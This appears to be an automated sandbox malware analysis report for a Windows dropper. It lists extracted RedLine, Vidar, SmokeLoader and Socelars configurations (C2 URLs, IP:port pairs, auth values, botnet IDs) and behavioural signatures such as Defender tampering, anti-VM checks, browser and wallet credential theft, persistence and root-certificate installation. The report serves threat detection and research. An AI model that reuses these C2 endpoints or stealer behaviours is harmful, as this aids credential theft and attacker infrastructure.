onlylogger | c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f

Analysis

max time kernel
85s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-03-2022 14:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe
Size

3.5MB
MD5

bcc094daa13f5d7254dfe77e37821fd4
SHA1

95655ba419c110502e92af7f485a49fc72215ae8
SHA256

c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f
SHA512

1fa49ded2bbe25b00698dd6c4c2fc023fc5fad07bc2d3d2b24b94a0d69a8d66908c8aff24ffb6db2a7c8bbbbc753dda2b8c71ffc8771fc9c63ca7c94691aee5e

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

redline

Botnet

Liez

zisiarenal.xyz:80

Extracted

Family

vidar

Version

39.9

Botnet

706

https://prophefliloc.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

da da

86.107.197.196:63065

Attributes

auth_value
9b1654b30797c210c85bd0890936a5b9

Extracted

Family

vidar

Version

50.7

Botnet

1177

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
1177

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

5.206.224.220:81

Attributes

auth_value
4330eefe7c0f986c945c8babe3202f28

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

pizzadlyath

65.108.101.231:14648

Attributes

auth_value
e6050567aab45ec7a388fed4947afdc2

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1896 3068 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1896	3068	rundll32.exe

RedLine Payload 16 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4848-203-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/524-233-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/524-234-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/524-239-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/524-237-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/524-253-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/524-249-0x0000000000100000-0x000000000024E000-memory.dmp	family_redline
behavioral2/memory/2836-270-0x0000000000580000-0x00000000005A0000-memory.dmp	family_redline
behavioral2/memory/3900-271-0x0000000000E20000-0x0000000000FA5000-memory.dmp	family_redline
behavioral2/memory/1340-277-0x00000000007C0000-0x0000000000945000-memory.dmp	family_redline
behavioral2/memory/3900-276-0x0000000000E20000-0x0000000000FA5000-memory.dmp	family_redline
behavioral2/memory/1340-273-0x00000000007C0000-0x0000000000945000-memory.dmp	family_redline
behavioral2/memory/2020-324-0x0000000000420000-0x0000000000440000-memory.dmp	family_redline
behavioral2/memory/2256-322-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4308-327-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3628-338-0x0000000000420000-0x0000000000440000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_8.txt	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_8.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1512-305-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger
behavioral2/memory/1512-307-0x0000000000710000-0x0000000000754000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2996-214-0x0000000004960000-0x00000000049FD000-memory.dmp	family_vidar
behavioral2/memory/2996-218-0x0000000000400000-0x0000000002CBE000-memory.dmp	family_vidar
behavioral2/memory/3880-311-0x0000000000F30000-0x00000000011DA000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 2 IoCs

Processes:

cmd.exeschtasks.exe

flow pid process

192 2836 cmd.exe
209 2020 schtasks.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
192	2836	cmd.exe
209	2020	schtasks.exe

Executes dropped EXE 47 IoCs

Processes:

setup_install.exejobiea_2.exejobiea_8.exejobiea_1.exejobiea_4.exejobiea_7.exejobiea_6.exejobiea_9.exejobiea_5.exejobiea_3.exejobiea_5.tmpjobiea_1.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejobiea_4.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exejfiag3g_gg.exeX2tHyRfbLCiSEGvxRfHP9KDn.exeFCHJHCDekamwNpDngZayoz6F.exeLtJ1felGu4soIKXp5Dgh3jVw.exe2WFg0YAugxukCc09BdDeLTto.exe3dZw0mQvxkvejyYXpFW8wB_H.exeJ9seiawQNMMR4_E62x1Rv0gr.exePrUQl1KDkuP7SNBQJLAjNzqT.exeqr1FieOxalJHqDh7zRadDXB3.exeWerFault.exeoxOJGlfM7qoCBNV2ezhKfyu8.exeUpy9ojVxh5Va9Al2R4Pph7BU.exetvh4PYp4mpfBXbNEU0dFPJQg.exewaJBZNSEJ4XbfLA8DjYTY7v3.exeXikSgapKZHI5wFzl8CKSDkfW.execmd.exeB8vU8f2pa0FVIN73V2a91Rf6.exeUeXNFcOHMv6F5tLSqDx8tzS_.exebneq8T3bG6_CLctwaavsv8D8.exea85JBdYxVEYEqXq9dd2HmxHs.exemN0k00SdRwavvkQ7x66BxjkN.exe02R3Nlw1e1hFW0CtOG2CO2Wu.exeInstall.exeInstall.exebneq8T3bG6_CLctwaavsv8D8.exe78ccec3f-f9fc-4df0-b04a-e2b8059fb177.exeI2gl2vrXgHDwgJP15ds0diai.exe

pid	process
3716	setup_install.exe
1712	jobiea_2.exe
1004	jobiea_8.exe
4480	jobiea_1.exe
1340	jobiea_4.exe
1388	jobiea_7.exe
1432	jobiea_6.exe
2248	jobiea_9.exe
4072	jobiea_5.exe
2996	jobiea_3.exe
4308	jobiea_5.tmp
208	jobiea_1.exe
3340	jfiag3g_gg.exe
3552	jfiag3g_gg.exe
3316	jfiag3g_gg.exe
3696	jfiag3g_gg.exe
4848	jobiea_4.exe
1228	jfiag3g_gg.exe
1356	jfiag3g_gg.exe
2552	jfiag3g_gg.exe
4544	jfiag3g_gg.exe
3412	X2tHyRfbLCiSEGvxRfHP9KDn.exe
2004	FCHJHCDekamwNpDngZayoz6F.exe
524	LtJ1felGu4soIKXp5Dgh3jVw.exe
4312	2WFg0YAugxukCc09BdDeLTto.exe
3880	3dZw0mQvxkvejyYXpFW8wB_H.exe
3900	J9seiawQNMMR4_E62x1Rv0gr.exe
3048	PrUQl1KDkuP7SNBQJLAjNzqT.exe
1544	qr1FieOxalJHqDh7zRadDXB3.exe
444	WerFault.exe
1332	oxOJGlfM7qoCBNV2ezhKfyu8.exe
3588	Upy9ojVxh5Va9Al2R4Pph7BU.exe
1512	tvh4PYp4mpfBXbNEU0dFPJQg.exe
1340	waJBZNSEJ4XbfLA8DjYTY7v3.exe
1868	XikSgapKZHI5wFzl8CKSDkfW.exe
2836	cmd.exe
4960	B8vU8f2pa0FVIN73V2a91Rf6.exe
2164	UeXNFcOHMv6F5tLSqDx8tzS_.exe
1916	bneq8T3bG6_CLctwaavsv8D8.exe
2552	a85JBdYxVEYEqXq9dd2HmxHs.exe
1452	mN0k00SdRwavvkQ7x66BxjkN.exe
1456	02R3Nlw1e1hFW0CtOG2CO2Wu.exe
4452	Install.exe
4656	Install.exe
5064	bneq8T3bG6_CLctwaavsv8D8.exe
4860	78ccec3f-f9fc-4df0-b04a-e2b8059fb177.exe
4064	I2gl2vrXgHDwgJP15ds0diai.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

oxOJGlfM7qoCBNV2ezhKfyu8.exeFCHJHCDekamwNpDngZayoz6F.exeqr1FieOxalJHqDh7zRadDXB3.exeWerFault.exePrUQl1KDkuP7SNBQJLAjNzqT.exea85JBdYxVEYEqXq9dd2HmxHs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	oxOJGlfM7qoCBNV2ezhKfyu8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FCHJHCDekamwNpDngZayoz6F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qr1FieOxalJHqDh7zRadDXB3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	PrUQl1KDkuP7SNBQJLAjNzqT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	PrUQl1KDkuP7SNBQJLAjNzqT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a85JBdYxVEYEqXq9dd2HmxHs.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FCHJHCDekamwNpDngZayoz6F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qr1FieOxalJHqDh7zRadDXB3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	oxOJGlfM7qoCBNV2ezhKfyu8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a85JBdYxVEYEqXq9dd2HmxHs.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

jobiea_1.exejobiea_7.exe2WFg0YAugxukCc09BdDeLTto.exeX2tHyRfbLCiSEGvxRfHP9KDn.exe02R3Nlw1e1hFW0CtOG2CO2Wu.exeI2gl2vrXgHDwgJP15ds0diai.exec180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	jobiea_1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	jobiea_7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	2WFg0YAugxukCc09BdDeLTto.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	X2tHyRfbLCiSEGvxRfHP9KDn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	02R3Nlw1e1hFW0CtOG2CO2Wu.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	I2gl2vrXgHDwgJP15ds0diai.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	c180f3fba35f7ddd50e5fa0ffc04d71fc12d85a7eafa64d06fe57ec88cc9b75f.exe

Loads dropped DLL 12 IoCs

Processes:

setup_install.exejobiea_5.tmp3dZw0mQvxkvejyYXpFW8wB_H.exeUeXNFcOHMv6F5tLSqDx8tzS_.exe

pid	process
3716	setup_install.exe
3716	setup_install.exe
3716	setup_install.exe
3716	setup_install.exe
3716	setup_install.exe
3716	setup_install.exe
3716	setup_install.exe
4308	jobiea_5.tmp
3880	3dZw0mQvxkvejyYXpFW8wB_H.exe
3880	3dZw0mQvxkvejyYXpFW8wB_H.exe
2164	UeXNFcOHMv6F5tLSqDx8tzS_.exe
2164	UeXNFcOHMv6F5tLSqDx8tzS_.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

02R3Nlw1e1hFW0CtOG2CO2Wu.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rwlyllzk = "\"C:\\Users\\Admin\\gxyactib.exe\""	02R3Nlw1e1hFW0CtOG2CO2Wu.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

FCHJHCDekamwNpDngZayoz6F.exeqr1FieOxalJHqDh7zRadDXB3.exePrUQl1KDkuP7SNBQJLAjNzqT.exeoxOJGlfM7qoCBNV2ezhKfyu8.exea85JBdYxVEYEqXq9dd2HmxHs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	FCHJHCDekamwNpDngZayoz6F.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qr1FieOxalJHqDh7zRadDXB3.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	PrUQl1KDkuP7SNBQJLAjNzqT.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	oxOJGlfM7qoCBNV2ezhKfyu8.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	a85JBdYxVEYEqXq9dd2HmxHs.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

190 ipinfo.io
191 ipinfo.io
238 ipinfo.io
4 ipinfo.io
5 ipinfo.io
12 ip-api.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

LtJ1felGu4soIKXp5Dgh3jVw.exe3dZw0mQvxkvejyYXpFW8wB_H.exeJ9seiawQNMMR4_E62x1Rv0gr.exewaJBZNSEJ4XbfLA8DjYTY7v3.exe

pid process

524 LtJ1felGu4soIKXp5Dgh3jVw.exe
3880 3dZw0mQvxkvejyYXpFW8wB_H.exe
3900 J9seiawQNMMR4_E62x1Rv0gr.exe
1340 waJBZNSEJ4XbfLA8DjYTY7v3.exe

flow	ioc
190	ipinfo.io
191	ipinfo.io
238	ipinfo.io
4	ipinfo.io
5	ipinfo.io
12	ip-api.com

pid	process
524	LtJ1felGu4soIKXp5Dgh3jVw.exe
3880	3dZw0mQvxkvejyYXpFW8wB_H.exe
3900	J9seiawQNMMR4_E62x1Rv0gr.exe
1340	waJBZNSEJ4XbfLA8DjYTY7v3.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

jobiea_4.exeFCHJHCDekamwNpDngZayoz6F.exeoxOJGlfM7qoCBNV2ezhKfyu8.exeqr1FieOxalJHqDh7zRadDXB3.exeWerFault.exePrUQl1KDkuP7SNBQJLAjNzqT.exebneq8T3bG6_CLctwaavsv8D8.exea85JBdYxVEYEqXq9dd2HmxHs.exe

description	pid	process	target process
PID 1340 set thread context of 4848	1340	jobiea_4.exe	jobiea_4.exe
PID 2004 set thread context of 2256	2004	FCHJHCDekamwNpDngZayoz6F.exe	AppLaunch.exe
PID 1332 set thread context of 2020	1332	oxOJGlfM7qoCBNV2ezhKfyu8.exe	AppLaunch.exe
PID 1544 set thread context of 4308	1544	qr1FieOxalJHqDh7zRadDXB3.exe	AppLaunch.exe
PID 444 set thread context of 3628	444	WerFault.exe	AppLaunch.exe
PID 3048 set thread context of 4576	3048	PrUQl1KDkuP7SNBQJLAjNzqT.exe	AppLaunch.exe
PID 1916 set thread context of 5064	1916	bneq8T3bG6_CLctwaavsv8D8.exe	bneq8T3bG6_CLctwaavsv8D8.exe
PID 2552 set thread context of 4496	2552	a85JBdYxVEYEqXq9dd2HmxHs.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

X2tHyRfbLCiSEGvxRfHP9KDn.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	X2tHyRfbLCiSEGvxRfHP9KDn.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	X2tHyRfbLCiSEGvxRfHP9KDn.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 27 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4352	3716	WerFault.exe	setup_install.exe
60	1868	WerFault.exe	XikSgapKZHI5wFzl8CKSDkfW.exe
380	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
4744	5064	WerFault.exe	bneq8T3bG6_CLctwaavsv8D8.exe
4380	1868	WerFault.exe	XikSgapKZHI5wFzl8CKSDkfW.exe
4948	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
3056	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
5092	1456	WerFault.exe	02R3Nlw1e1hFW0CtOG2CO2Wu.exe
5092	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
5392	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
5740	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
5844	1008	WerFault.exe	txtQabKHHgnk1PNqukvGeOEM.exe
5952	4380	WerFault.exe	gxyactib.exe
4416	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
1672	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
5444	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
5356	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
3048	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
5612	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
2264	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
6024	1512	WerFault.exe	tvh4PYp4mpfBXbNEU0dFPJQg.exe
6140	2292	WerFault.exe	3A5tRAyE7sIteKC0IQnsP_cn.exe
524	808	WerFault.exe	siww1049.exe
1496	3048	WerFault.exe	anytime2.exe
5464	2216	WerFault.exe	anytime3.exe
3512	1564	WerFault.exe	anytime1.exe
2412	5164	WerFault.exe	bearvpn3.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

jobiea_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jobiea_2.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

UeXNFcOHMv6F5tLSqDx8tzS_.exe3dZw0mQvxkvejyYXpFW8wB_H.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	UeXNFcOHMv6F5tLSqDx8tzS_.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3dZw0mQvxkvejyYXpFW8wB_H.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3dZw0mQvxkvejyYXpFW8wB_H.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	UeXNFcOHMv6F5tLSqDx8tzS_.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5320 schtasks.exe
3484 schtasks.exe
4548 schtasks.exe
4340 schtasks.exe
3948 schtasks.exe
Delays execution with timeout.exe 4 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exe

pid process

1444 timeout.exe
5656 timeout.exe
5672 timeout.exe
1704 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5004 taskkill.exe
5584 taskkill.exe
5576 taskkill.exe
5884 taskkill.exe

pid	process
5320	schtasks.exe
3484	schtasks.exe
4548	schtasks.exe
4340	schtasks.exe
3948	schtasks.exe

pid	process
1444	timeout.exe
5656	timeout.exe
5672	timeout.exe
1704	timeout.exe

pid	process
5004	taskkill.exe
5584	taskkill.exe
5576	taskkill.exe
5884	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

jobiea_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	jobiea_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	jobiea_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

jobiea_2.exe

pid	process
1712	jobiea_2.exe
1712	jobiea_2.exe
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
